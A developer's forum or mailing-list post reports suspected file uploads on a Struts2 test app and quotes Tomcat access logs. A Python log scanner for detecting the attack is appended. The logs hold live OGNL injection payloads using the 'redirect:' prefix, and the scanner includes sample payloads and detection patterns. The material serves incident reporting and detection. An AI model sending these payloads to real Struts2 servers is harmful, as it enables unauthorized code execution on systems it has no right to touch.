I have seen a sample app for testing which was developed using Struts2. I saw some unknown files getting uploaded on test.

I initially thought that my Tomcat was hacked or my server was hacked, but now, after a close analysis, it looks like a Struts2/WebWork security issue or vulnerability, or maybe my misconfiguration or something; not sure. Can anyone in the Struts2 team fix this globally and help me to get rid of this locally without version upgrades?

Here are the Tomcat logs, which clearly tell the story:

60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
60.15.137.72 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test2.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74
60.15.137.72 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test3.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest'),%23b%3d%23a.getRealPath(%22/%22),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23b),%23matt.getWriter().flush(),%23matt.getWriter().close()%7D HTTP/1.0" 200 74

I hope my issue is clear and valid.

Original issue on Stack Overflow at http://stackoverflow.com/questions/21104956/tomcat-files-getting-uploaded-security-loophole

--
*With Best Regards,*
Amol Ghotankar
Technical Lead
M: +91 9960 980 419
<http://www.cursivetech.com>
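An added example, not from the original post or the Struts project: a small Python scanner that parses Tomcat common-format access-log lines and flags requests whose query string carries a Struts action prefix (`redirect:` / `redirectAction:`) together with an OGNL expression, the pattern visible in the quoted logs. The sample log lines, IPs (documentation addresses) and paths below are constructed.

```python
import re
from urllib.parse import unquote

# Constructed sample access-log lines modelled on the post's; the IPs are documentation
# addresses and the payloads are shortened, nothing here comes from a real server.
SAMPLE_LOG = """\
198.51.100.7 - - [27/Jan/2014:17:51:48 +0530] "GET /common/test.action?redirect:$%7B%23a%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest')%7D HTTP/1.0" 200 74
198.51.100.7 - - [27/Jan/2014:17:51:49 +0530] "GET /common/test2.action?redirectAction:%25%7B%23foo%3d1%7D HTTP/1.0" 200 74
203.0.113.5 - - [27/Jan/2014:17:52:01 +0530] "GET /common/login.action?user=alice HTTP/1.1" 200 1532
203.0.113.5 - - [27/Jan/2014:17:52:03 +0530] "POST /common/upload.action HTTP/1.1" 302 -
"""

# Tomcat "common" access-log format: host ident user [time] "method target proto" status bytes
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)
# A query-string parameter whose name carries a Struts action prefix.
PREFIX_RE = re.compile(r'(^|&)(redirect|redirectAction):', re.IGNORECASE)


def parse_line(line):
    """Split one access-log line into fields, or return None if it does not match."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None


def classify_request(target):
    """Return the indicator names found in the decoded query string of a request target."""
    _path, _sep, query = target.partition('?')
    decoded = unquote(unquote(query))  # decode twice: payloads are often double-encoded
    indicators = []
    if PREFIX_RE.search(decoded):
        indicators.append('action-prefix')
    if '${' in decoded or '%{' in decoded:
        indicators.append('ognl-expression')
    if '#context' in decoded or '#_memberAccess' in decoded:
        indicators.append('ognl-context-access')
    return indicators


def scan_log(text):
    """Return one record per request that combines an action prefix with an OGNL expression."""
    hits = []
    for line in text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        indicators = classify_request(rec['target'])
        if 'action-prefix' in indicators and len(indicators) > 1:
            hits.append({'ip': rec['ip'], 'ts': rec['ts'], 'status': rec['status'],
                         'path': rec['target'].partition('?')[0], 'indicators': indicators})
    return hits
```

Each hit keeps the response status, so a 200 on such a request (as in the quoted lines) can be separated from one the server rejected.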